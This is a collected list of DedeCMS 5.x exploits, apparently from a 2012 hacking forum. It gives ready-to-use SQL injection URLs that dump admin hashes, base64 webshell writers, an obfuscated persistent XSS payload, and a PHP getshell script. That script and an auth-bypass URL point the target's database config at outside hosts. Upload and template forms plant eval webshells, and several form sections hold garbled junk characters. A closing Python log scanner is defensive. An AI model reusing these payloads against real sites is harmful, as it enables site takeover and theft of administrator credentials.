DedeCMS Vulnerability Summary

Posted 2012-10-18 10:42:14
Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with the password xiao, a one-line webshell.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; afterwards, however you visit either of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable-overwrite getshell
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell returns the first response line (the HTTP status line);
// "OK" beyond offset 12 corresponds to "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// URL-encoded form body sent to mytag_js.php
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return "";
}
fwrite($ock,$data);
$exp="";
while (!feof($ock)) {
// read and return only the first line of the response
$exp=fgets($ock, 1024);
return $exp;
}
return $exp;
}
?>

DedeCMS v5.6-5.7 unauthorised access vulnerability (straight into the back end)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site back end.

Prerequisite: this only works once the back-end path is known.
Dedecms (织梦) tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, post an article and upload an image; then, in attachment management, replace the image with our crafted template. Suppose the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source, and construct a form:
# c5 R6 q! ^. }8 [<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, x: k2 Q. C2 x" F<input type="hidden" name="dopost" value="save" />
6 K+ G# J% B+ ~7 K( _<input type="hidden" name="aid" value="2" />
1 Z( z3 B2 y$ J% `, }1 P<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />$ w+ t  T/ o7 p
<input type="hidden" name="channelid" value="1" />
4 z: u( [; X" F9 ~<input type="hidden" name="oldlitpic" value="" />
3 `' L2 p* _1 M<input type="hidden" name="sortrank" value="1275972263" />
( H* W0 D( V. W) w* I* d
2 B+ O. p: C& s3 d
* o( b  T% n4 P- i" R+ C) v9 \: B<div id="mainCp">* [0 }2 m5 v: g( n, F; i
<h3 class="meTitle"><strong>修改文章</strong></h3>
3 r* G6 `# ^. {4 B5 O4 e
0 R$ I! U8 A/ Z- k  F% q; R. D9 f& Q  B8 @' t6 k
<div class="postForm">& ~) A+ U. C! u; ]7 s
<label>标题:</label># b/ \; d4 N2 ]3 Y. p) J3 q8 L
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
7 J1 N5 U  D8 ]6 E
3 e) ~6 d# }# Q# O4 ]- R( i! W0 T8 D& [6 O1 W" o. n' B8 `% e
<label>标签TAG:</label>" y$ ^  q, u* I+ m% J; h3 ~
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)! T/ t3 a2 ~  f- a  y/ V- V) ?

- D$ }4 W8 I$ H. V7 z2 k& H0 P1 Y  ~" r8 n% @& l) ?/ c3 H" n
<label>作者:</label>
7 x9 S  I4 \. R, X0 X  \( Q<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, W$ E. Z. d7 R  q1 ]1 n
1 h+ W6 F/ C, i7 x9 J6 v2 W: K" N
; X6 m, {% V6 h+ Y2 u1 f
<label>隶属栏目:</label>! |# O9 b4 v0 s/ e- W9 g9 j* G
<select name='typeid' size='1'>
9 r% L- j0 L" P! y! ]<option value='1' class='option3' selected=''>测试栏目</option>7 L  q/ H$ L  R1 x+ n: M6 Z7 I9 l
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)1 j* E+ K/ y; n1 n2 J/ R

8 {& g7 Z! D8 b( V5 h- ~7 q8 }  P; M4 K8 |
<label>我的分类:</label>
$ s, m* t* t" E3 M8 z6 G<select name='mtypesid' size='1'>; h# x: g( f- A; S4 y, @
<option value='0' selected>请选择分类...</option>& V. C( [- a! r9 Y
<option value='1' class='option3' selected>hahahha</option>
' ^' d$ C$ O1 C1 O& v</select>
7 G9 x4 R" S9 r5 R0 A
; O3 c$ b6 l  y0 H) m
0 c2 n5 b; ?3 o5 b' }. o/ }<label>信息摘要:</label>
( @$ Z8 M* P. y0 h9 e; y<textarea name="description" id="description">1111111</textarea>5 R# b3 o6 L3 ~
(内容的简要说明)) z. x; _# R0 [1 \+ N
) e- D( y5 ~$ @: k- h& b
0 [" f. x7 h1 {1 Z+ p: m1 m1 L5 X
<label>缩略图:</label>* @5 P2 |# W6 o$ Y
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
1 \/ ]% p3 h: n
5 s+ ^; I8 N+ C6 C
3 f& v4 O$ C) \. U4 z<input type='text' name='templet'
5 L4 o9 T1 [% t2 b7 H1 u# ~- `value="../ uploads/userup/2/12OMX04-15A.jpg">
6 O+ p" N6 P) p1 v% ~/ ]<input type='text' name='dede_addonfields'
$ [7 y: B9 `% ?4 Lvalue="templet,htmltext;">(这里构造)
2 g" J, Z' F+ v! D7 Y: ]7 L0 _</div>
0 y+ d1 F/ B: H( _2 r+ I
! w) b4 I6 O. W! R$ A; U$ E+ t: C) L* P3 ]6 H' E8 K5 @
<!-- 表单操作区域 -->
( \, j* i% |6 F<h3 class="meTitle">详细内容</h3>
" u* C1 d5 b5 _0 S# B- W
- f  w9 q6 h" l% v3 T( S/ U
0 ~: L  n' ]# \. e3 b* P<div class="contentShow postForm">
& s- \6 H  a3 e<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
4 f$ R. D. a1 I; e3 F! ~4 n1 W: Y& Y; [. O# ^3 ^

/ ~/ |4 p4 F2 t. `: W, I8 k<label>验证码:</label>& U5 }1 d- r- y3 Y9 H5 V" F
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
5 r; }/ q+ ]- g+ |7 i<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />4 x$ e! d1 \! k: q9 d

5 e/ G6 H- f/ T! k  `+ D! k) W4 X; _
<button class="button2" type="submit">提交</button>8 Q8 T$ |) z5 r% Z
<button class="button2 ml10" type="reset">重置</button>$ ~# x; J! P8 E3 ~- H7 y
</div>& f4 z1 u* j" |  P, D9 @

7 d; }' I6 D. S* ^$ h' W
8 |/ _" r! l1 z8 I3 y</div>+ D# E, j# ?5 a; C, I% v+ J5 s
5 E: X3 f* v, ~$ s3 U* |- I

. h' x- P8 ^) i- z</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Construct the form above; after the upload the image is stored as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:

9 j* h, K  n9 |% w& T# |9 C& L( f( s8 C" |7 w; o6 [, e
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
, e+ R3 j) a% F5 k2 [# n# k6 {<input type="hidden" name="dopost" value="save" />
0 V7 v* ^. d' t  c/ t) T<input type="hidden" name="aid" value="2" />
# ]" \$ a/ E0 v% F5 }<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
3 K; Q3 e, O3 F<input type="hidden" name="channelid" value="1" /> 0 E; L7 r: k$ L
<input type="hidden" name="oldlitpic" value="" /> * \/ o' U. ]8 A1 z- @& g8 |+ }
<input type="hidden" name="sortrank" value="1282049150" /> % f8 {% c9 X# `( s) _* I
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ) F7 u) c+ W$ c7 W5 O3 S
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
2 G8 q" m5 u3 @& e: T" B/ S% Z; y* q<select name='typeid' size='1'>
8 F' K, i+ |  E9 ^5 R<option value='1' class='option3' selected=''>Test</option> & v; d- J, p8 O' W0 w6 D( e% K
<select name='mtypesid' size='1'> & k, l& Z  g/ \9 N. `3 {
<option value='0' selected>请选择分类...</option>
, Y; a/ U* A$ `4 a<option value='1' class='option3' selected>aa</option></select>
; Y" S- _0 o) l, {<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
" C5 b, D0 _$ v- P& W<input type='hidden' name='dede_addonfields' value="templet"> ' G9 K. d; x$ {4 l% x* B4 @- B
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 8 x- n9 W# B, o
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 0 ]- F5 C$ i8 A$ ]. T, R
<button class="button2" type="submit">提交</button>
- I* [, @4 i8 A: w* f</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; from that, drop 3 characters at the front and 1 at the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL error raised by a numeric overflow in a field value, together with DedeCMS recording database error messages in a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.
' t2 T" N3 U$ ~5 g' ]; I5 Q7 m1 z) \8 l' R3 p5 W1 W2 C
/ M2 H! y: H. z$ z/ z2 y
* \3 J' k+ C/ A8 g1 U: |
. s% @: H) Q% J. a- ^
' s4 a" A6 X3 x1 l0 Y
9 W. @) T* }& t! `6 ~" g( e) ?, C( J
* F1 F; L4 `# P' P2 x
5 i: ]- \, I: y' @1 C; B* V
( A, u7 V& o0 j" b* F% v
5 `+ g& N1 k  \% B5 t, G5 ]6 |8 r, O7 H; k
' L& S" p0 h# F

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
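Defender-side triage for the request patterns collected in this post, as an added example that is not code from the original post or from DedeCMS: it scans combined-format access-log lines and names which payload family each request resembles. The signature names, regexes, client addresses and timestamps are assumptions chosen for this example.

```python
"""Access-log triage for the DedeCMS request patterns collected in this post.

Added example (not code from the original post or from DedeCMS). Matching
runs on the URL-decoded request path, so percent-encoded variants are caught.
Signature names, regexes, addresses and timestamps are assumptions.
"""
import re
from urllib.parse import unquote_plus

# One regex per payload family seen in the post (assumed triage patterns, not
# DedeCMS's own rules and not a complete WAF rule set).
SIGNATURES = {
    # _POST[GLOBALS][cfg_dbhost]=... style config overwrite in a query string
    "globals_overwrite": re.compile(
        r"_(?:COOKIE|POST|GET|REQUEST)\[GLOBALS\]"
        r"|\bcfg_(?:dbhost|dbuser|dbpwd|dbname|dbprefix|basedir"
        r"|imgtype|softtype|mediatype|not_allowall)=", re.I),
    # rss.php _Cs[] array injection
    "rss_cs_injection": re.compile(r"rss\.php\?.*_Cs\[", re.I),
    # gotopage= carrying markup (the persistent XSS section)
    "gotopage_xss": re.compile(r'gotopage=[^&]*[<>"]', re.I),
    # advancedsearch.php handed a raw SQL statement
    "raw_sql_param": re.compile(r"advancedsearch\.php\?.*\bsql=", re.I),
    # oldface= / templet= / code= escaping the intended directory
    "path_traversal": re.compile(r"\b(?:oldface|templet|code)=[^&]*\.\./", re.I),
    # UNION-based injection (feedback_js.php, infosearch.php sections)
    "union_select": re.compile(r"union\s+select", re.I),
}

# Combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def classify_request(path):
    """Return the signature names that match the URL-decoded request path."""
    decoded = unquote_plus(path)  # undecodable bytes become U+FFFD, never raise
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(lines):
    """Return (client_ip, method, path, hits) for every line that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip the line rather than crash
        ip, _ts, method, path, _status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((ip, method, path, hits))
    return findings


# Constructed sample lines (RFC 5737 test addresses, arbitrary timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&userid=admin&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=192.0.2.10 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:31 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:40 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:55 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 30 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:43:02 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2012:10:43:10 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, method, path, hits in scan_access_log(SAMPLE_LOG):
        print(ip, method, ",".join(hits), path[:70])
```

POST bodies such as the _COOKIE[GLOBALS] form fields sent to mytag_js.php never reach a standard access log, so that family is only visible here when it rides in the query string; request-body logging or a WAF is needed to see the rest.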